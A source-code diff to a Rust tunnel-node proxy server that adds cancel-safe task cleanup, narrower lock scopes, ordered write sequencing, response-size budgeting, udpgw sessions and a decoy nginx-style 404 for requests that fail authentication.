@@ -307,6 +420,27 @@ async fn drain_now(session: &SessionInner) -> (Vec<u8>, bool) {
 ///     wait for a real notify. Without this filter, an idle long-poll
 ///     batch could return in <1 ms on a stale permit and degrade push
 ///     delivery to the client's idle re-poll cadence.
+/// `JoinHandle` newtype that aborts the task on `Drop`. Lets the waiter
+/// helpers below be cancel-safe under `tokio::select!`: a plain
+/// `Vec<JoinHandle<()>>` only releases its handles via `Drop`, which
+/// *detaches* tasks rather than aborting them. The previous shape
+/// relied on a trailing `for w in &watchers { w.abort(); }` loop —
+/// fine when the function ran to completion, but past the cancellation
+/// points (`is_any_drainable().await`, the inner `select!`), so
+/// cancelling the loser arm of the phase-2 `select!` left N orphan
+/// watchers parked on `notify.notified()`. Each held an
+/// `Arc<…Inner>` and could steal a `notify_one()` permit from a
+/// future batch's watcher, making that batch wait until the next
+/// notify or its deadline. Wrapping in `AbortOnDrop` makes cleanup
+/// happen on every exit path, including cancellation.
+struct AbortOnDrop(tokio::task::JoinHandle<()>);
+
+impl Drop for AbortOnDrop {
+    fn drop(&mut self) {
+        self.0.abort();
+    }
+}
+
 async fn wait_for_any_drainable(inners: &[Arc<SessionInner>], deadline: Duration) {
     if inners.is_empty() {
         return;
@@ -314,15 +448,15 @@ async fn wait_for_any_drainable(inners: &[Arc<SessionInner>], deadline: Duration
 
     // One watcher per session. Each loops until it observes real state
     // (eof set or buffer non-empty) before signaling — see the
-    // race-safety note on `wait_for_any_drainable` for why. We abort the
-    // watchers on return; the only state they hold is a notify
-    // subscription, so abort is clean.
+    // race-safety note above. Watchers are held in a Vec of
+    // `AbortOnDrop`, so they're aborted on every exit path —
+    // including cancellation by an outer `select!`.
     let (tx, mut rx) = mpsc::channel::<()>(1);
-    let mut watchers = Vec::with_capacity(inners.len());
+    let mut _watchers: Vec<AbortOnDrop> = Vec::with_capacity(inners.len());
     for inner in inners {
         let inner = inner.clone();
         let tx = tx.clone();
-        watchers.push(tokio::spawn(async move {
+        _watchers.push(AbortOnDrop(tokio::spawn(async move {
             loop {
                 inner.notify.notified().await;
                 if inner.eof.load(Ordering::Acquire) {
@@ -337,7 +471,7 @@ async fn wait_for_any_drainable(inners: &[Arc<SessionInner>], deadline: Duration
                 // notify, don't wake the caller.
             }
             let _ = tx.try_send(());
-        }));
+        })));
     }
     drop(tx);
 
@@ -355,9 +489,9 @@ async fn wait_for_any_drainable(inners: &[Arc<SessionInner>], deadline: Duration
         }
     }
 
-    for w in &watchers {
-        w.abort();
-    }
+    // No explicit abort loop: `_watchers`'s `AbortOnDrop` entries fire
+    // on the function returning here AND on the future being dropped
+    // mid-await by an outer `select!`.
 }
 
 /// True iff any session is currently drainable: its read buffer has
@@ -395,12 +529,14 @@ async fn wait_for_any_udp_drainable(inners: &[Arc<UdpSessionInner>], deadline: D
         return;
     }
 
+    // See `AbortOnDrop` and the comment on `wait_for_any_drainable`
+    // for why watchers must be aborted on every exit path.
     let (tx, mut rx) = mpsc::channel::<()>(1);
-    let mut watchers = Vec::with_capacity(inners.len());
+    let mut _watchers: Vec<AbortOnDrop> = Vec::with_capacity(inners.len());
     for inner in inners {
         let inner = inner.clone();
         let tx = tx.clone();
-        watchers.push(tokio::spawn(async move {
+        _watchers.push(AbortOnDrop(tokio::spawn(async move {
             loop {
                 inner.notify.notified().await;
                 if inner.eof.load(Ordering::Acquire) {
@@ -413,7 +549,7 @@ async fn wait_for_any_udp_drainable(inners: &[Arc<UdpSessionInner>], deadline: D
                 // prior batch. Loop back, don't wake the caller.
             }
             let _ = tx.try_send(());
-        }));
+        })));
     }
     drop(tx);
 
@@ -424,10 +560,6 @@ async fn wait_for_any_udp_drainable(inners: &[Arc<UdpSessionInner>], deadline: D
             _ = tokio::time::sleep(deadline) => {}
         }
     }
-
-    for w in &watchers {
-        w.abort();
-    }
 }
 
 async fn is_any_udp_drainable(inners: &[Arc<UdpSessionInner>]) -> bool {
@@ -479,7 +611,20 @@ async fn wait_and_drain(session: &SessionInner, max_wait: Duration) -> (Vec<u8>,
 struct AppState {
     sessions: Arc<Mutex<HashMap<String, ManagedSession>>>,
     udp_sessions: Arc<Mutex<HashMap<String, ManagedUdpSession>>>,
-    auth_key: String,
+    /// Shared, immutable after startup. `Arc<str>` so each `state.clone()`
+    /// — once per phase-1 spawn in the batch handler — is a refcount bump
+    /// instead of a fresh String allocation.
+    auth_key: Arc<str>,
+    /// Active probing defense: when false (default, production), bad
+    /// AUTH_KEY responses are a generic-looking 404 with no JSON-shaped
+    /// "unauthorized" body — same as a static nginx 404. Active scanners
+    /// that POST malformed payloads to `/tunnel` to discover proxy
+    /// endpoints categorize this as a non-tunnel host and move on.
+    /// Enable via `MHRV_DIAGNOSTIC=1` for setup/debugging — restores the
+    /// previous JSON `{"e":"unauthorized"}` body so it's clear *which*
+    /// of "wrong key", "wrong URL path", or "wrong tunnel-node" you've
+    /// hit. (Inspired by #365 Section 3.)
+    diagnostic_mode: bool,
 }
 
 // ---------------------------------------------------------------------------
@@ -507,17 +652,19 @@ struct TunnelResponse {
     #[serde(skip_serializing_if = "Option::is_none")] eof: Option<bool>,
     #[serde(skip_serializing_if = "Option::is_none")] e: Option<String>,
     #[serde(skip_serializing_if = "Option::is_none")] code: Option<String>,
+    #[serde(skip_serializing_if = "Option::is_none")] seq: Option<u64>,
 }
 
 impl TunnelResponse {
     fn error(msg: impl Into<String>) -> Self {
-        Self { sid: None, d: None, pkts: None, eof: None, e: Some(msg.into()), code: None }
+        Self { sid: None, d: None, pkts: None, eof: None, e: Some(msg.into()), code: None, seq: None }
     }
     fn unsupported_op(op: &str) -> Self {
         Self {
             sid: None, d: None, pkts: None, eof: None,
             e: Some(format!("unknown op: {}", op)),
             code: Some(CODE_UNSUPPORTED_OP.into()),
+            seq: None,
         }
     }
 }
@@ -539,6 +686,8 @@ struct BatchOp {
     #[serde(default)] host: Option<String>,
     #[serde(default)] port: Option<u16>,
     #[serde(default)] d: Option<String>, // base64 data
+    #[serde(default)] seq: Option<u64>,
+    #[serde(default)] wseq: Option<u64>,
 }
 
 #[derive(Serialize)]
@@ -553,19 +702,41 @@ struct BatchResponse {
 async fn handle_tunnel(
     State(state): State<AppState>,
     Json(req): Json<TunnelRequest>,
-) -> Json<TunnelResponse> {
-    if req.k != state.auth_key {
-        return Json(TunnelResponse::error("unauthorized"));
+) -> axum::response::Response {
+    if req.k != *state.auth_key {
+        return decoy_or_unauthorized(state.diagnostic_mode);
     }
-    match req.op.as_str() {
-        "connect" => Json(handle_connect(&state, req.host, req.port).await),
+    let resp: TunnelResponse = match req.op.as_str() {
+        "connect" => handle_connect(&state, req.host, req.port).await,
         "connect_data" => {
-            Json(handle_connect_data_single(&state, req.host, req.port, req.data).await)
+            handle_connect_data_single(&state, req.host, req.port, req.data).await
         }
-        "data" => Json(handle_data_single(&state, req.sid, req.data).await),
-        "close" => Json(handle_close(&state, req.sid).await),
-        other => Json(TunnelResponse::unsupported_op(other)),
-    }
+        "data" => handle_data_single(&state, req.sid, req.data).await,
+        "close" => handle_close(&state, req.sid).await,
+        other => TunnelResponse::unsupported_op(other),
+    };
+    Json(resp).into_response()
+}
+
+/// Active-probing defense for the bad-auth path. Production default is
+/// a 404 with a generic "Not Found" HTML body that mimics a vanilla
+/// nginx/apache static error page — active scanners categorize this
+/// as a regular web server with nothing interesting and move on.
+/// `MHRV_DIAGNOSTIC=1` restores the previous JSON `{"e":"unauthorized"}`
+/// body so misconfigured clients get a clear error during setup.
+fn decoy_or_unauthorized(diagnostic_mode: bool) -> axum::response::Response {
+    if diagnostic_mode {
+        return Json(TunnelResponse::error("unauthorized")).into_response();
+    }
+    let body = "<html>\r\n<head><title>404 Not Found</title></head>\r\n\
+                <body>\r\n<center><h1>404 Not Found</h1></center>\r\n\
+                <hr><center>nginx</center>\r\n</body>\r\n</html>\r\n";
+    (
+        StatusCode::NOT_FOUND,
+        [(header::CONTENT_TYPE, "text/html")],
+        body,
+    )
+        .into_response()
 }
 
 // ---------------------------------------------------------------------------
@@ -601,11 +772,21 @@ async fn handle_batch(
         }
     };
 
-    if req.k != state.auth_key {
-        let resp = serde_json::to_vec(&BatchResponse {
-            r: vec![TunnelResponse::error("unauthorized")],
-        }).unwrap_or_default();
-        return (StatusCode::OK, [(header::CONTENT_TYPE, "application/json")], resp);
+    if req.k != *state.auth_key {
+        if state.diagnostic_mode {
+            let resp = serde_json::to_vec(&BatchResponse {
+                r: vec![TunnelResponse::error("unauthorized")],
+            }).unwrap_or_default();
+            return (StatusCode::OK, [(header::CONTENT_TYPE, "application/json")], resp);
+        }
+        // Production: same nginx-404 decoy as the single-op path. See
+        // `decoy_or_unauthorized` for rationale.
+        let body = "<html>\r\n<head><title>404 Not Found</title></head>\r\n\
+                    <body>\r\n<center><h1>404 Not Found</h1></center>\r\n\
+                    <hr><center>nginx</center>\r\n</body>\r\n</html>\r\n"
+            .as_bytes()
+            .to_vec();
+        return (StatusCode::NOT_FOUND, [(header::CONTENT_TYPE, "text/html")], body);
     }
 
     // Process all ops in two phases.
@@ -624,8 +805,13 @@ async fn handle_batch(
     // still fires from server-speaks-first ports and from the preread
     // timeout fallback path.
     let mut results: Vec<(usize, TunnelResponse)> = Vec::with_capacity(req.ops.len());
-    let mut tcp_drains: Vec<(usize, String)> = Vec::new();
-    let mut udp_drains: Vec<(usize, String)> = Vec::new();
+    // Each drain entry carries the session's `Arc<…Inner>` alongside the
+    // sid. Phase 2 drains through the Arc directly so the global sessions
+    // map lock isn't held across the per-session read_buf / packets
+    // mutex acquisition — without this, every other batch (and every
+    // connect/close op) head-of-line-blocks behind the drain.
+    let mut tcp_drains: Vec<(usize, String, Arc<SessionInner>, Option<u64>)> = Vec::new();
+    let mut udp_drains: Vec<(usize, String, Arc<UdpSessionInner>, Option<u64>)> = Vec::new();
     // True iff the batch contained any op that performed a real action
     // upstream — a new connection or a non-empty data write. A batch of
     // only empty "data" / "udp_data" polls (and possibly closes) leaves
@@ -634,8 +820,8 @@ async fn handle_batch(
 
     enum NewConn {
         Connect(TunnelResponse),
-        ConnectData(Result<String, TunnelResponse>),
-        UdpOpen(Result<String, TunnelResponse>),
+        ConnectData(Result<(String, Arc<SessionInner>), TunnelResponse>),
+        UdpOpen(Result<(String, Arc<UdpSessionInner>), TunnelResponse>),
     }
     let mut new_conn_jobs: JoinSet<(usize, NewConn)> = JoinSet::new();
 
@@ -657,13 +843,11 @@ async fn handle_batch(
                 let port = op.port;
                 let d = op.d.clone();
                 new_conn_jobs.spawn(async move {
-                    // Drop the returned Arc<SessionInner>: phase 2 below
-                    // re-looks up each sid under one sessions-map lock,
-                    // which is cheap. The Arc return is a convenience for
-                    // the single-op path only.
-                    let r = handle_connect_data_phase1(&state, host, port, d)
-                        .await
-                        .map(|(sid, _inner)| sid);
+                    // Keep the returned Arc<SessionInner>: phase 2 drains
+                    // through it directly, so the global sessions map
+                    // lock doesn't have to be held across the per-session
+                    // read_buf.lock().await.
+                    let r = handle_connect_data_phase1(&state, host, port, d).await;
                     (i, NewConn::ConnectData(r))
                 });
             }
@@ -680,9 +864,7 @@ async fn handle_batch(
                 let port = op.port;
                 let d = op.d.clone();
                 new_conn_jobs.spawn(async move {
-                    let r = handle_udp_open_phase1(&state, host, port, d)
-                        .await
-                        .map(|(sid, _inner)| sid);
+                    let r = handle_udp_open_phase1(&state, host, port, d).await;
                     (i, NewConn::UdpOpen(r))
                 });
             }
@@ -692,27 +874,92 @@ async fn handle_batch(
                     _ => { results.push((i, TunnelResponse::error("missing sid"))); continue; }
                 };
 
-                // Write outbound data
-                let sessions = state.sessions.lock().await;
-                if let Some(session) = sessions.get(&sid) {
-                    *session.inner.last_active.lock().await = Instant::now();
+                // Clone the inner under the map lock and release it
+                // before any await. The previous shape held the global
+                // sessions map across last_active.lock(), writer.lock(),
+                // write_all, and flush — head-of-line-blocking every
+                // other batch and connect/close op for the duration of
+                // a single upstream write. The udp_data branch below
+                // already does the right thing; this matches it.
+                let inner = {
+                    let sessions = state.sessions.lock().await;
+                    sessions.get(&sid).map(|s| s.inner.clone())
+                };
+                if let Some(inner) = inner {
+                    *inner.last_active.lock().await = Instant::now();
                     if let Some(ref data_b64) = op.d {
                         if !data_b64.is_empty() {
-                            had_writes_or_connects = true;
-                            if let Ok(bytes) = B64.decode(data_b64) {
-                                if !bytes.is_empty() {
-                                    let mut w = session.inner.writer.lock().await;
-                                    let _ = w.write_all(&bytes).await;
-                                    let _ = w.flush().await;
+                            // Decode first; only count this op as a real
+                            // write (and demote the batch out of long-poll)
+                            // after a successful non-empty decode. Mirrors
+                            // the udp_data branch and avoids silently
+                            // dropping bytes on bad base64.
+                            let bytes = match B64.decode(data_b64) {
+                                Ok(b) => b,
+                                Err(e) => {
+                                    results.push((
+                                        i,
+                                        TunnelResponse::error(format!("bad base64: {}", e)),
+                                    ));
+                                    continue;
+                                }
+                            };
+                            if !bytes.is_empty() {
+                                had_writes_or_connects = true;
+                                tracing::info!(
+                                    "session {} upload {}B wseq={:?}",
+                                    &sid[..sid.len().min(8)], bytes.len(), op.wseq,
+                                );
+                                match op.wseq {
+                                    None => {
+                                        // Old client (no wseq): write immediately.
+                                        let mut w = inner.writer.lock().await;
+                                        let _ = w.write_all(&bytes).await;
+                                        let _ = w.flush().await;
+                                    }
+                                    Some(wseq) => {
+                                        let mut nws = inner.next_write_seq.lock().await;
+                                        let expected = nws.get_or_insert(wseq);
+
+                                        if wseq < *expected {
+                                            // Stale / duplicate — skip.
+                                            tracing::debug!(
+                                                "session {} wseq {} < expected {} — skipping",
+                                                &sid[..sid.len().min(8)], wseq, *expected,
+                                            );
+                                        } else if wseq == *expected {
+                                            // In order — write immediately.
+                                            let mut w = inner.writer.lock().await;
+                                            let _ = w.write_all(&bytes).await;
+                                            *expected += 1;
+
+                                            // Flush any buffered writes that
+                                            // are now in sequence.
+                                            let mut pw = inner.pending_writes.lock().await;
+                                            while let Some(entry) = pw.first_entry() {
+                                                if *entry.key() != *expected { break; }
+                                                let (_, buffered) = entry.remove_entry();
+                                                let _ = w.write_all(&buffered).await;
+                                                *expected += 1;
+                                            }
+                                            let _ = w.flush().await;
+                                        } else {
+                                            // Out of order — buffer for later.
+                                            tracing::debug!(
+                                                "session {} wseq {} > expected {} — buffering",
+                                                &sid[..sid.len().min(8)], wseq, *expected,
+                                            );
+                                            let mut pw = inner.pending_writes.lock().await;
+                                            pw.insert(wseq, bytes);
+                                        }
+                                    }
                                 }
                             }
                         }
                     }
-                    drop(sessions);
-                    tcp_drains.push((i, sid));
+                    tcp_drains.push((i, sid, inner, op.seq));
                 } else {
-                    drop(sessions);
-                    results.push((i, eof_response(sid)));
+                    results.push((i, eof_response(sid, op.seq)));
                 }
             }
             "udp_data" => {
@@ -753,9 +1000,9 @@ async fn handle_batch(
                     if had_uplink {
                         *inner.last_active.lock().await = Instant::now();
                     }
-                    udp_drains.push((i, sid));
+                    udp_drains.push((i, sid, inner, op.seq));
                 } else {
-                    results.push((i, eof_response(sid)));
+                    results.push((i, eof_response(sid, op.seq)));
                 }
             }
             "close" => {
@@ -774,9 +1021,13 @@ async fn handle_batch(
     while let Some(join) = new_conn_jobs.join_next().await {
         match join {
             Ok((i, NewConn::Connect(r))) => results.push((i, r)),
-            Ok((i, NewConn::ConnectData(Ok(sid)))) => tcp_drains.push((i, sid)),
+            Ok((i, NewConn::ConnectData(Ok((sid, inner))))) => {
+                tcp_drains.push((i, sid, inner, None));
+            }
             Ok((i, NewConn::ConnectData(Err(r)))) => results.push((i, r)),
-            Ok((i, NewConn::UdpOpen(Ok(sid)))) => udp_drains.push((i, sid)),
+            Ok((i, NewConn::UdpOpen(Ok((sid, inner))))) => {
+                udp_drains.push((i, sid, inner, None));
+            }
             Ok((i, NewConn::UdpOpen(Err(r)))) => results.push((i, r)),
             Err(e) => {
                 tracing::error!("new-connection task panicked: {}", e);
@@ -802,90 +1053,159 @@ async fn handle_batch(
             LONGPOLL_DEADLINE
         };
 
-        let tcp_inners: Vec<Arc<SessionInner>> = {
-            let sessions = state.sessions.lock().await;
-            tcp_drains
-                .iter()
-                .filter_map(|(_, sid)| sessions.get(sid).map(|s| s.inner.clone()))
-                .collect()
-        };
-        let udp_inners: Vec<Arc<UdpSessionInner>> = {
-            let sessions = state.udp_sessions.lock().await;
-            udp_drains
-                .iter()
-                .filter_map(|(_, sid)| sessions.get(sid).map(|s| s.inner.clone()))
-                .collect()
-        };
-
-        let wait_start = Instant::now();
-        // Wait for either side to wake. Running both concurrently means
-        // a TCP-only batch isn't slowed by a stale UDP watch list, and
-        // vice versa.
-        tokio::join!(
-            wait_for_any_drainable(&tcp_inners, deadline),
-            wait_for_any_udp_drainable(&udp_inners, deadline),
-        );
+        // Phase 1 already gave us each session's Arc<…Inner>, so we
+        // don't need to re-acquire the sessions map lock here. Cloning
+        // the Arc is just a refcount bump.
+        let tcp_inners: Vec<Arc<SessionInner>> =
+            tcp_drains.iter().map(|(_, _, inner, _)| inner.clone()).collect();
+        let udp_inners: Vec<Arc<UdpSessionInner>> =
+            udp_drains.iter().map(|(_, _, inner, _)| inner.clone()).collect();
+
+        // Wake on whichever side has work first. The previous
+        // `tokio::join!` was conjunctive — a TCP burst still paid the
+        // UDP deadline in mixed batches because the UDP waiter had to
+        // elapse too. `wait_for_*_drainable` short-circuits on an empty
+        // slice, so we have to skip the empty side; otherwise its
+        // instant return would fire the select arm before the other
+        // side ever got a chance to wait.
+        match (tcp_inners.is_empty(), udp_inners.is_empty()) {
+            (true, true) => {}
+            (false, true) => wait_for_any_drainable(&tcp_inners, deadline).await,
+            (true, false) => wait_for_any_udp_drainable(&udp_inners, deadline).await,
+            (false, false) => {
+                tokio::select! {
+                    _ = wait_for_any_drainable(&tcp_inners, deadline) => {}
+                    _ = wait_for_any_udp_drainable(&udp_inners, deadline) => {}
+                }
+            }
+        }
 
         if had_writes_or_connects {
-            let remaining = deadline.saturating_sub(wait_start.elapsed());
-            if !remaining.is_zero() {
-                tokio::time::sleep(STRAGGLER_SETTLE.min(remaining)).await;
+            // Adaptive settle: keep waiting in steps while new data
+            // keeps arriving. Break when:
+            //  1. No new data arrived in the last step (burst is over)
+            //  2. STRAGGLER_SETTLE_MAX reached
+            let settle_end = Instant::now() + STRAGGLER_SETTLE_MAX;
+            let mut prev_tcp_bytes: usize = 0;
+            let mut prev_udp_pkts: usize = 0;
+            // Snapshot current buffer sizes.
+            for inner in &tcp_inners {
+                prev_tcp_bytes += inner.read_buf.lock().await.len();
             }
-        }
+            for inner in &udp_inners {
+                prev_udp_pkts += inner.packets.lock().await.len();
+            }
+            loop {
+                let now = Instant::now();
+                if now >= settle_end {
+                    break;
+                }
+                let remaining = settle_end.duration_since(now);
+                tokio::time::sleep(STRAGGLER_SETTLE_STEP.min(remaining)).await;
+
+                // Measure current buffer sizes.
+                let mut tcp_bytes: usize = 0;
+                let mut udp_pkts: usize = 0;
+                for inner in &tcp_inners {
+                    tcp_bytes += inner.read_buf.lock().await.len();
+                }
+                for inner in &udp_inners {
+                    udp_pkts += inner.packets.lock().await.len();
+                }
 
-        // ---- TCP drain ----
-        if !tcp_drains.is_empty() {
-            let sessions = state.sessions.lock().await;
-            for (i, sid) in &tcp_drains {
-                if let Some(session) = sessions.get(sid) {
-                    let (data, eof) = drain_now(&session.inner).await;
-                    results.push((*i, tcp_drain_response(sid.clone(), data, eof)));
-                } else {
-                    results.push((*i, eof_response(sid.clone())));
+                // No new data since last step — burst is over.
+                if tcp_bytes == prev_tcp_bytes && udp_pkts == prev_udp_pkts {
+                    break;
                 }
+
+                prev_tcp_bytes = tcp_bytes;
+                prev_udp_pkts = udp_pkts;
             }
-            drop(sessions);
+        }
 
-            // Clean up eof TCP sessions.
+        // ---- TCP drain ----
+        // Drain through each session's already-cloned Arc so the global
+        // sessions map lock isn't held across the per-session
+        // read_buf.lock().await.
+        //
+        // Cleanup is driven off `drain_now`'s returned `eof`, NOT the
+        // raw `inner.eof` atomic. When the buffer exceeds
+        // `TCP_DRAIN_MAX_BYTES`, `drain_now` deliberately returns
+        // `eof = false` and leaves the tail in the buffer so the
+        // client can pick it up on the next poll. The previous cleanup
+        // read the atomic directly, so on a high-throughput session
+        // that closed mid-burst (issue #460-style) it would remove the
+        // session and abort the reader_task with the tail still
+        // buffered, dropping those bytes.
+        let mut tcp_eof_sids: Vec<String> = Vec::new();
+        // Track remaining batch-response budget across all session drains
+        // (#863). Per-session `TCP_DRAIN_MAX_BYTES` alone wasn't enough —
+        // several concurrent sessions each contributing 16 MiB summed past
+        // Apps Script's 50 MiB response ceiling. This cap stops one session
+        // short of the cliff; deferred sessions drain on the next poll.
+        let mut remaining_budget: usize = BATCH_RESPONSE_BUDGET;
+        for (i, sid, inner, seq) in &tcp_drains {
+            // Drain in a loop: keep reading until the buffer is empty
+            // so we catch data that arrives during the drain itself.
+            let mut all_data = Vec::new();
+            let mut final_eof = false;
+            let drain_deadline = Instant::now() + Duration::from_secs(1);
+            loop {
+                let (data, eof) = drain_now(inner, remaining_budget.saturating_sub(all_data.len())).await;
+                if eof { final_eof = true; }
+                if data.is_empty() { break; }
+                let hit_session_cap = data.len() >= TCP_DRAIN_MAX_BYTES;
+                all_data.extend_from_slice(&data);
+                if final_eof || hit_session_cap || all_data.len() >= remaining_budget { break; }
+                if Instant::now() >= drain_deadline { break; }
+                // Brief yield to let reader_task finish its current read
+                tokio::task::yield_now().await;
+            }
+            let drained = all_data.len();
+            if drained > 0 {
+                tracing::info!("session {} drained {}KB", &sid[..sid.len().min(8)], drained / 1024);
+            }
+            if final_eof {
+                tcp_eof_sids.push(sid.clone());
+            }
+            results.push((*i, tcp_drain_response(sid.clone(), all_data, final_eof, *seq)));
+            remaining_budget = remaining_budget.saturating_sub(drained);
+            if remaining_budget == 0 {
+                break;
+            }
+        }
+        if !tcp_eof_sids.is_empty() {
             let mut sessions = state.sessions.lock().await;
-            for (_, sid) in &tcp_drains {
-                if let Some(s) = sessions.get(sid) {
-                    if s.inner.eof.load(Ordering::Acquire) {
-                        if let Some(s) = sessions.remove(sid) {
-                            s.reader_handle.abort();
-                            tracing::info!("session {} closed by remote (batch)", sid);
-                        }
-                    }
+            for sid in &tcp_eof_sids {
+                if let Some(s) = sessions.remove(sid) {
+                    s.reader_handle.abort();
+                    tracing::info!("session {} closed by remote (batch)", sid);
                 }
             }
         }
 
         // ---- UDP drain ----
-        if !udp_drains.is_empty() {
-            {
-                let sessions = state.udp_sessions.lock().await;
-                for (i, sid) in &udp_drains {
-                    if let Some(session) = sessions.get(sid) {
-                        let (packets, eof) = drain_udp_now(&session.inner).await;
-                        results.push((*i, udp_drain_response(sid.clone(), packets, eof)));
-                    } else {
-                        results.push((*i, eof_response(sid.clone())));
-                    }
-                }
+        // Same shape as TCP. `drain_udp_now` currently drains the full
+        // queue with no per-batch cap, so its returned `eof` already
+        // matches the atomic — driving cleanup off the drain return
+        // is future-proofing: if a UDP per-batch packet cap is ever
+        // added (mirroring `TCP_DRAIN_MAX_BYTES`), the same data-loss
+        // trap that motivated the TCP-side fix reappears, and tracking
+        // eof from the drain return rather than the atomic catches it.
+        let mut udp_eof_sids: Vec<String> = Vec::new();
+        for (i, sid, inner, seq) in &udp_drains {
+            let (packets, eof) = drain_udp_now(inner).await;
+            if eof {
+                udp_eof_sids.push(sid.clone());
             }
-
-            // Clean up eof UDP sessions so a future batch with the same
-            // sid gets the "session not found" eof immediately rather
-            // than re-checking the (already-stale) eof flag.
+            results.push((*i, udp_drain_response(sid.clone(), packets, eof, *seq)));
+        }
+        if !udp_eof_sids.is_empty() {
             let mut sessions = state.udp_sessions.lock().await;
-            for (_, sid) in &udp_drains {
-                if let Some(s) = sessions.get(sid) {
-                    if s.inner.eof.load(Ordering::Acquire) {
-                        if let Some(s) = sessions.remove(sid) {
-                            s.reader_handle.abort();
-                            tracing::info!("udp session {} closed by remote (batch)", sid);
-                        }
-                    }
+            for sid in &udp_eof_sids {
+                if let Some(s) = sessions.remove(sid) {
+                    s.reader_handle.abort();
+                    tracing::info!("udp session {} closed by remote (batch)", sid);
                 }
             }
         }
@@ -901,7 +1221,7 @@ async fn handle_batch(
     (StatusCode::OK, [(header::CONTENT_TYPE, "application/json")], json)
 }
 
-fn tcp_drain_response(sid: String, data: Vec<u8>, eof: bool) -> TunnelResponse {
+fn tcp_drain_response(sid: String, data: Vec<u8>, eof: bool, seq: Option<u64>) -> TunnelResponse {
     TunnelResponse {
         sid: Some(sid),
         d: if data.is_empty() { None } else { Some(B64.encode(&data)) },
@@ -909,10 +1229,11 @@ fn tcp_drain_response(sid: String, data: Vec<u8>, eof: bool) -> TunnelResponse {
         eof: Some(eof),
         e: None,
         code: None,
+        seq,
     }
 }
 
-fn udp_drain_response(sid: String, packets: Vec<Vec<u8>>, eof: bool) -> TunnelResponse {
+fn udp_drain_response(sid: String, packets: Vec<Vec<u8>>, eof: bool, seq: Option<u64>) -> TunnelResponse {
     let pkts = if packets.is_empty() {
         None
     } else {
@@ -925,10 +1246,11 @@ fn udp_drain_response(sid: String, packets: Vec<Vec<u8>>, eof: bool) -> TunnelRe
         eof: Some(eof),
         e: None,
         code: None,
+        seq,
     }
 }
 
-fn eof_response(sid: String) -> TunnelResponse {
+fn eof_response(sid: String, seq: Option<u64>) -> TunnelResponse {
     TunnelResponse {
         sid: Some(sid),
         d: None,
@@ -936,6 +1258,7 @@ fn eof_response(sid: String) -> TunnelResponse {
         eof: Some(true),
         e: None,
         code: None,
+        seq,
     }
 }
 
@@ -971,22 +1294,27 @@ async fn handle_connect(state: &AppState, host: Option<String>, port: Option<u16
         Ok(v) => v,
         Err(r) => return r,
     };
-    let session = match create_session(&host, port).await {
-        Ok(s) => s,
-        Err(e) => return TunnelResponse::error(format!("connect failed: {}", e)),
+    let session = if udpgw::is_udpgw_dest(&host, port) {
+        create_udpgw_session()
+    } else {
+        match create_session(&host, port).await {
+            Ok(s) => s,
+            Err(e) => return TunnelResponse::error(format!("connect failed: {}", e)),
+        }
     };
     let sid = uuid::Uuid::new_v4().to_string();
     tracing::info!("session {} -> {}:{}", sid, host, port);
     state.sessions.lock().await.insert(sid.clone(), session);
-    TunnelResponse { sid: Some(sid), d: None, pkts: None, eof: Some(false), e: None, code: None }
+    TunnelResponse { sid: Some(sid), d: None, pkts: None, eof: Some(false), e: None, code: None, seq: None }
 }
 
 /// Open a session and write the client's first bytes in one round trip.
-/// Returns the new sid plus an `Arc<SessionInner>` so unary callers
-/// (`handle_connect_data_single`) can drain the first response without a
-/// second sessions-map lookup. The batch caller drops the Arc — it takes
-/// a single lock across all drain-bound sessions in phase 2, which is
-/// cheaper than the Arc plumbing would be.
+/// Returns the new sid plus an `Arc<SessionInner>`. Both callers keep
+/// the Arc: the unary path (`handle_connect_data_single`) uses it to
+/// drain the first response without a second sessions-map lookup, and
+/// the batch path threads it into `tcp_drains` so phase-2 drain runs
+/// without holding the global sessions map lock across the per-session
+/// `read_buf.lock().await`.
 async fn handle_connect_data_phase1(
     state: &AppState,
     host: Option<String>,
@@ -995,9 +1323,13 @@ async fn handle_connect_data_phase1(
 ) -> Result<(String, Arc<SessionInner>), TunnelResponse> {
     let (host, port) = validate_host_port(host, port)?;
 
-    let session = create_session(&host, port)
-        .await
-        .map_err(|e| TunnelResponse::error(format!("connect failed: {}", e)))?;
+    let session = if udpgw::is_udpgw_dest(&host, port) {
+        create_udpgw_session()
+    } else {
+        create_session(&host, port)
+            .await
+            .map_err(|e| TunnelResponse::error(format!("connect failed: {}", e)))?
+    };
 
     // Any failure below this point must abort the reader task, otherwise
     // the newly-opened upstream TCP connection would leak. Keep the
@@ -1095,6 +1427,7 @@ async fn handle_connect_data_single(
         eof: Some(eof),
         e: None,
         code: None,
+        seq: None,
     }
 }
 
@@ -1103,19 +1436,27 @@ async fn handle_data_single(state: &AppState, sid: Option<String>, data: Option<
         Some(s) if !s.is_empty() => s,
         _ => return TunnelResponse::error("missing sid"),
     };
-    let sessions = state.sessions.lock().await;
-    let session = match sessions.get(&sid) {
-        Some(s) => s,
+    // Clone the inner Arc under the global sessions map lock and release
+    // the map lock before any await. The previous shape held the map
+    // across last_active.lock(), writer.lock(), write_all, flush, AND
+    // wait_and_drain — up to 5 s of head-of-line blocking on every other
+    // single-op or batch request. Mirrors the batch-handler "data" path.
+    let inner = {
+        let sessions = state.sessions.lock().await;
+        sessions.get(&sid).map(|s| s.inner.clone())
+    };
+    let inner = match inner {
+        Some(i) => i,
         None => return TunnelResponse::error("unknown session"),
     };
-    *session.inner.last_active.lock().await = Instant::now();
+    *inner.last_active.lock().await = Instant::now();
     if let Some(ref data_b64) = data {
         if !data_b64.is_empty() {
             if let Ok(bytes) = B64.decode(data_b64) {
                 if !bytes.is_empty() {
-                    let mut w = session.inner.writer.lock().await;
+                    let mut w = inner.writer.lock().await;
                     if let Err(e) = w.write_all(&bytes).await {
-                        drop(w); drop(sessions);
+                        drop(w);
                         state.sessions.lock().await.remove(&sid);
                         return TunnelResponse::error(format!("write failed: {}", e));
                     }
@@ -1124,8 +1465,7 @@ async fn handle_data_single(state: &AppState, sid: Option<String>, data: Option<
             }
         }
     }
-    let (data, eof) = wait_and_drain(&session.inner, Duration::from_secs(5)).await;
-    drop(sessions);
+    let (data, eof) = wait_and_drain(&inner, Duration::from_secs(5)).await;
     if eof {
         if let Some(s) = state.sessions.lock().await.remove(&sid) {
             s.reader_handle.abort();
@@ -1136,7 +1476,7 @@ async fn handle_data_single(state: &AppState, sid: Option<String>, data: Option<
         sid: Some(sid),
         d: if data.is_empty() { None } else { Some(B64.encode(&data)) },
         pkts: None,
-        eof: Some(eof), e: None, code: None,
+        eof: Some(eof), e: None, code: None, seq: None,
     }
 }
 
